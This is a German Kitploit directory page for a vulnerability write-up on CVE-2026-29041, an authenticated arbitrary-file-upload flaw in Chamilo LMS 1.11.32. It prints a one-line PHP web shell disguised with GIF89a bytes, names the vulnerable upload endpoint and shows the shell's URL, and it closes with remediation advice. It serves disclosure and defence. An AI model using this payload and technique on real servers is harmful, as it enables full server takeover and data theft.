Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-29041 — Hallo, ich bin K, das ist mein erstes CVE, eine Remote Code Execution (RCE)-Schwachstelle. Es ist der Beginn meiner Reise als Sicherheitsforscher. | Kitploit
Tools/GitHubGitHub/kx00007/cve-2026-29041
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubkx00007/cve-2026-29041

CVE-2026-29041

Hallo, ich bin K, das ist mein erstes CVE, eine Remote Code Execution (RCE)-Schwachstelle. Es ist der Beginn meiner Reise als Sicherheitsforscher.

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-29041 — Authentifizierte RCE durch uneingeschränkten Datei-Upload in Chamilo LMS 1.11.32

Authentifizierte Remote Code Execution in Chamilo LMS 1.11.32 durch unsachgemäße Datei-Upload-Validierung im ck_uploadimage-AJAX-Endpunkt. Ein Benutzer mit niedrigen Rechten (Student) kann eine als Bild getarnte PHP-Web-Shell hochladen und so die vollständige Kontrolle über den Server erlangen.


📋 Schwachstellen-Zusammenfassung

FeldDetails
ProduktChamilo LMS
Version1.11.32 (Bestätigt)
SchwachstelleUneingeschränkter Datei-Upload mit gefährlichem Typ (CWE-434)
AuswirkungAuthentifizierte Remote Code Execution (RCE)
CVSS v3.18.8 (HOCH) — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Authentifizierung erforderlich✅ Ja — Studentenrolle (Niedrige Rechte)
CWECWE-434: Uneingeschränkter Upload von Dateien mit gefährlichem Typ
Entdeckt vonMENG HOKSENG

🧠 Details zur Schwachstelle

Betroffener Endpunkt

root@kitploit:~
POST /main/inc/ajax/document.ajax.php?a=ck_uploadimage&cidReq=[COURSE_ID]

Verwundbare Datei: main/inc/ajax/document.ajax.php
Verwundbare Funktion: ck_uploadimage

Analyse der Ursache

Der Upload-Handler führt nur eine MIME-Typ-Validierung mit der PHP-Funktion mime_content_type() durch, die die Magic Bytes der Datei (die ersten Bytes des Inhalts) prüft, nicht die Dateierweiterung.

root@kitploit:~
// Verwundbare Validierungslogik (vereinfacht)
$mime = mime_content_type($_FILES['upload']['tmp_name']);

if (!mimeAccepted($mime, ['image'])) {
    die("Ungültiger Dateityp");
}

// ❌ Keine Validierung der Dateierweiterung
// ❌ Keine Bereinigung des Dateinamens
move_uploaded_file($_FILES['upload']['tmp_name'], $uploadPath . $fileUploadName);

Zwei separate Schwächen kombinieren sich zu einer vollständigen Exploit-Kette:

  1. Nur MIME-Typ-Validierung — umgangen durch Voranstellen gültiger Bild-Magic-Bytes (GIF89a) vor PHP-Code
  2. Originaler Dateiname bleibt erhalten — der Server speichert die Datei unter dem vom Angreifer kontrollierten Dateinamen einschließlich der .php-Erweiterung in einem über das Web zugänglichen Verzeichnis

Umgehungstechnik

Eine bösartige Datei wird wie folgt erstellt:

root@kitploit:~
GIF89a;<?php system($_GET['cmd']); ?>
  • mime_content_type() liest GIF89a → klassifiziert als image/gif → besteht die Validierung
  • move_uploaded_file() speichert als shell.php in /app/upload/users/<id>/ → direkt über den Browser ausführbar

💣 Proof of Concept

Führen Sie den vollständigen Exploit aus, der sich als Student anmeldet, um den Datei-Upload automatisch durchzuführen image Nach dem Ausführen des vollständigen Python-Exploits finden wir unsere hochgeladene Web-Shell unter http://localhost:8081/app/upload/users/3/3/my_fileszhxoxgwj.php?cmd=id image

🛡️ Auswirkungen

Eine erfolgreiche Ausnutzung dieser Schwachstelle führt zu vollständiger Server-Kompromittierung von einem Studentenkonto aus:

  • 🔴 Remote Code Execution — beliebige Betriebssystembefehle über die Web-Shell
  • 🔴 Datenextraktion — vollständiger Zugriff auf Datenbank-Anmeldedaten der Anwendung und Dateien
  • 🔴 Laterale Bewegung — Übergang zum internen Netzwerk vom kompromittierten Server aus
  • 🔴 Persistenz — Möglichkeit, Hintertüren in über das Web zugänglichen Verzeichnissen zu platzieren
  • 🔴 Dienstunterbrechung — Änderung oder Löschung von Kursinhalten und Benutzerdaten

CIA-Auswirkung: Vollständiger Verlust von Vertraulichkeit, Integrität und Verfügbarkeit.


🔧 Behebung

▪ Strikte Zulassungsliste für Dateierweiterungen durchsetzen Nur ausdrücklich erlaubte Bilddateierweiterungen (z. B. .jpg, .png, .gif) sollten akzeptiert werden. Hochgeladene Dateien mit ausführbaren Erweiterungen wie .php, .phtml oder .phar müssen abgelehnt werden, unabhängig vom MIME-Typ.

▪ Sich nicht ausschließlich auf die MIME-Typ-Validierung verlassen MIME-Typ-Prüfungen mit Funktionen wie mime_content_type() sollten nicht als primäre Sicherheitskontrolle verwendet werden, da sie mit manipulierten Datei-Headern umgangen werden können. Die MIME-Validierung sollte nur als sekundäre Prüfung verwendet werden.

▪ Hochgeladene Dateien außerhalb von über das Web zugänglichen Verzeichnissen speichern Hochgeladene Inhalte sollten in einem Verzeichnis gespeichert werden, das nicht direkt über den Web- Server zugänglich ist. Wenn öffentlicher Zugriff erforderlich ist, sollten Dateien über einen kontrollierten Handler bereitgestellt werden und nicht über direkten Zugriff.

📄 Referenzen

  • Chamilo LMS Offizielle Website
  • CWE-434: Uneingeschränkter Upload von Dateien mit gefährlichem Typ
  • OWASP: Uneingeschränkter Datei-Upload
  • CVSS v3.1 Rechner

👤 Autor

MENG HOKSENG
Unabhängiger Sicherheitsforscher


⚠️ Rechtlicher Haftungsausschluss

Dieses Projekt wird nur für Bildungs- und autorisierte Sicherheitsforschungszwecke veröffentlicht. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch diesen Exploit verursacht werden. Holen Sie immer eine ausdrückliche schriftliche Genehmigung ein, bevor Sie Sicherheitsbewertungen durchführen.

Tool herunterladen